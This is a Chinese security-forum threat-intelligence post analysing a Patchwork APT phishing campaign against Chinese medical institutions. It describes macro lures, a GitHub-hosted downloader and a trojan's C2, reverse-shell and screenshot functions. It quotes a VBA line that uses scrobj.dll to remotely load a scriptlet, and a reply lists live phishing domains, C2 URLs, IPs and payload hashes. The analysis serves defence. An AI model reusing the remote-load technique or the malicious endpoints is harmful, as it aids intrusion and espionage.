首页
社区
课程
招聘
[原创]烈火烧不尽的“恶性毒草”—— 摩诃草APT组织的攻击活动
发表于: 2020-2-17 17:55 5270

[原创]烈火烧不尽的“恶性毒草”—— 摩诃草APT组织的攻击活动

2020-2-17 17:55
5270

印度背景的APT组织代号为APT-C-09,又名摩诃草,白象,PatchWork, angOver,VICEROY TIGER,The Dropping Elephan。

摩诃草组织主要针对中国、巴基斯坦等亚洲地区国家进行网络间谍活动,其中以窃取敏感信息为主。相关攻击活动最早可以追溯到2009年11月,至今还非常活跃。在针对中国地区的攻击中,该组织主要针对政府机构、科研教育领域进行攻击,其中以科研教育领域为主。

摩诃草组织最早由Norman安全公司于2013年曝光,随后又有其他安全厂商持续追踪并披露该组织的最新活动,但该组织并未由于相关攻击行动曝光而停止对相关目标的攻击,相反从2015年开始更加活跃。

从2009年至今,该组织针对不同国家和领域至少发动了3波攻击行动和1次疑似攻击行动。整个攻击过程使用了大量系统漏洞,其中至少包括一次0day漏洞攻击;该组织所采用的恶意代码非常繁杂。载荷投递的方式相对传统,主要是以鱼叉邮件进行恶意代码的传播,另外部分行动会采用少量水坑方式进行攻击;值得关注的是,在最近一次攻击行动中,出现了基于即时通讯工具和社交网络的恶意代码投递方式,进一步还会使用钓鱼网站进行社会工程学攻击。在攻击目标的选择上,该组织主要针对Windows系统进行攻击,同时我们也发现了存在针对Mac OS X系统的攻击,从2015年开始,甚至出现了针对Android OS移动设备的攻击

Gcow安全团队追影小组于2019.11月底通过监测的手段监测到了该组织的一些针对我国医疗部门的活动.直至2020.2月初,摩诃草APT组织通过投递带有恶意宏文件的xls文件,以及使用带有诱饵文档通过点击下载托管于GitHub上的downloader样本,以及用相应的钓鱼网站,用以侦探情报等一系列活动.这对我国的相关部门具有很大的危害,追影小组对其活动进行了跟踪与分析,写成报告供给各位看官更好的了解该组织的一些手法。

l 当然肯定有人会问为什么你说的简介里摩诃草组织这么厉害,而这次活动却水平不如之前呢?

l 本团队的追影小组主观认为因为这次活动只是该组织下的CNC小组所开展的活动,文末会给出相应的关联证据.不过这只是一家之言还请各路表哥多加批评

注意:文中相关IOCs由于特殊原因不给予放出,敏感信息已经打码处理

该诱饵文档托管于该网址上

http://xxx-xxx.com/%E6%AD%A6%E6%B1%89%E6%97%85%E8%A1%8C%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%94%B3%E8%AF%B7%E8%A1%A8.xlsm


这是一个含有宏的xlsm电子表格文件,利用社会工程学的办法,诱使目标”启用内容”来执行宏恶意代码

提取的宏代码如下

 

当目标启用内容后就会执行Workbook_Open的代码

 DllInstall False, ByVal StrPtr(Sheet1.Range("X100").Value)

通过加载scrobj.dll调用

远程加载http://45.xxx.xxx.67/window.sct,这种是利用Microsoft系统文件的LOLbin以绕过杀软的监测,达到远程执行代码目的。

其中Sheet1.Range("X100").Value 是小技巧,将payload隐藏在Sheet1中,通过VBA获取下载地址,起到一定混淆保护效果

 

通过windows.sct再下载到到启动目录,并重名为Temp.exe,并运行该程序

如下图

 

系统启动文件夹

 

文件信息:

 

 

主要功能:

1.自身拷贝到当前用户的AppData\Roaming和C:\Microsoft目录下并重命名msupdate.exe,并且创建并写入uuid.txt,来标识不同用户

 

 

2.通过com组件创建计划任务,实现持久化控制。

 

 

3. 与服务器进行C&C通讯,实现了shell,文件上传与下载(ftp),获取屏幕快照功能,达到完全控制目标。

获取uuid通知主机上线

 

通过http协议与服务器进行通讯,并获取相关指令

上线指令

 

反向Cmd Shell相关代码

 

 

文件上传相关代码

 

文件下载相关代码

 

屏幕快照相关代码

 

 

该文档托管于

http://xxx-xxx.com/h_879834932/%E5%8D%AB%E7%94%9F%E9%83%A8%E6%8C%87%E4%BB%A4.docx

 

诱使目标点击提交按钮,触发Shell.Explorer.1 从internet Explorer下载并运行submit_details.exe木马程序.

文件信息:

 

 

功能分析:

1.建立计划任务

 

 

2.收集目标机器名,ip,等信息

 


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 5
支持
分享
最新回复 (6)
雪    币: 6347
活跃值: (2149)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
不知道有没有放出来的样本或者idb文件,想学习一下
2020-2-17 21:21
0
雪    币: 881
活跃值: (9856)
能力值: ( LV13,RANK:385 )
在线值:
发帖
回帖
粉丝
3
有没有样本,下载下来分析一下。 托管网址已经打不开了。
2020-2-18 08:19
0
雪    币: 9792
活跃值: (1675)
能力值: ( LV12,RANK:261 )
在线值:
发帖
回帖
粉丝
4
URL:
http://nhc-gov.com/submit.html
http://nhc-gov.com/%E6%AD%A6%E6%B1%89%E6%97%85%E8%A1%8C%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%94%B3%E8%AF%B7%E8%A1%A8.xlsm
http://nhc-gov.com/form.html?OZBTg_TFORM
http://nhc-gov.com/h_879834932/%E5%8D%AB%E7%94%9F%E9%83%A8%E6%8C%87%E4%BB%A4.docx
http://45.153.184.67/window.jpeg
http://45.153.184.67/window.sct
https://185.193.38.24/cnc/register
https://185.193.38.24/cnc/tasks/request
https://185.193.38.24/cnc/tasks/result
https://45.138.172.168/qhupdate/pagetip/getconf
https://45.138.172.168/qhupdate/pagetip/cloudquery...
https://45.138.172.168/qhupdate/msquery/
https://94.140.125.177/cnc/register
https://94.140.125.177/cnc/tasks/request
https://94.140.125.177/cnc/tasks/result
https://github.com/nhcprc/qw_785789988/blob/master/submit_details.exe
https://chinadaily-news.com/n2012228aumki7339990n/32368288_lopi9829
https://api.github.com/repos/ccps268/meetingid/git/blobs/d956fbd55581e178658da908cb36cd93431cd9e1
https://raw.githubusercontent.com/ccps268/meeti

Ip
185.193.38.24
140.82.118.3
151.101.0.133
45.153.184.67
94.140.114.136

Md5
ecdec7d959171a829e14ebc1a13a3705ef203dd83e7fa6015d89261c2a832536
603506996b902b8797cbc1dc4bf350440caad5c59feb97c39344fd7648403b5d
470fc42a9bce42ab74d62811d1682a31b4c203e8268b0e745e269e330236c431
470fc42a9bce42ab74d62811d1682a31b4c203e8268b0e745e269e330236c431
fc7c04af29790f0e7240770dcea60ac8fbeb51e2827ae284481845d7bd8bc978
733f94b5080f75228e7ddebc7f1029ec0dac89a76d5dbd0b703e3c4a406ee663
0fbde9b2a041b22a1ab0dbb04c2e4765120af3efb4d3139434ceadda665d7409
32bf0fcc3145d58baa9fcb092a756ca8aa8aee3fa2f7ffd3e87943920df75b0f
013790b1dcdd7b9288cf749aef4d8bb499197a86edd05b302abb7142f458ec9a
2020-2-24 15:33
0
雪    币: 316
活跃值: (67)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
写的不错
2020-3-1 15:19
0
雪    币: 3127
活跃值: (2075)
能力值: ( LV10,RANK:160 )
在线值:
发帖
回帖
粉丝
6
朽_木 写的不错
谢谢朽木哥
2020-3-4 00:30
0
雪    币: 142
活跃值: (121)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
7
g_vx?vx?
2020-3-6 15:10
0
游客
登录 | 注册 方可回帖
返回
//